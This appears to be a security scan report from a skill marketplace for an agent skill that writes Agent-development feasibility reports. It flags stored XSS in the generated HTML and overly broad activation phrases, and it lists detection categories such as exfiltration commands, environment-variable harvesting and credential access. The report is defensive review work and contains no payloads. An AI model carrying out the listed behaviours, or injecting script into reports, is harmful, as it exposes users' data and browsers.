ClawHub

Agent开发决策辅助系统

Security checks across malware telemetry and agentic risk

Overview

The skill matches its stated report-generation purpose, but broad activation phrases and unsafe active HTML report generation warrant review before installation.

Review this before installing. Use it only when you intentionally want an Agent feasibility report, keep output paths inside a safe workspace, and be cautious opening generated HTML if any report content came from untrusted user input or web pages. The publisher should narrow activation phrases, add confirmation before web/file actions, constrain output paths, and HTML-escape report content.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • Trigger AbuseOverly Broad Trigger, Shadow Command Trigger, Keyword Baiting Trigger
  • Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • Privilege EscalationExcessive Permissions, Sudo/Root Execution, Credential Access
Findings (4)

Context-Inappropriate Capability

Medium
Confidence
98% confidence
Finding
The generator interpolates many user-controlled fields directly into HTML attributes, element bodies, and the page title without any output encoding. Because the produced report is an active HTML document that also contains inline JavaScript, an attacker can inject script or markup via inputs such as name, direction, or nested JSON fields, leading to stored/local XSS when the report is opened in a browser.

Vague Triggers

Medium
Confidence
89% confidence
Finding
The trigger phrases shown in the README are broad natural-language requests such as 'Agent开发', '做Agent应用', and similar generic wording. In a chat-based host, overly generic triggers can cause the skill to activate during ordinary discussion about agents rather than when the user explicitly intends to invoke this specific skill, leading to unintended execution, confusion, or disclosure of user inputs to the skill pipeline.

Vague Triggers

Medium
Confidence
92% confidence
Finding
The trigger phrases are broad and include common natural-language expressions such as 'Agent开发', '搭建Agent', and 'AI助手开发', which can cause the skill to activate in contexts where the user did not clearly intend it. In an agent with WebSearch, WebFetch, Bash, and file-writing/report-generation capabilities, accidental activation can lead to unintended external requests or file creation based on ordinary conversation.

Vague Triggers

Medium
Confidence
94% confidence
Finding
The usage examples accept free-form requests like '帮我评估做AI法律咨询Agent可行吗', which trains the system to treat ordinary conversational prompts as activation signals without boundary markers. Because the workflow includes web access and HTML report generation via Python and file output, ambiguous invocation increases the risk of unintended tool use, unnecessary data collection, or overwriting files during routine discussion.

VirusTotal

65/65 vendors flagged this skill as clean.

View on VirusTotal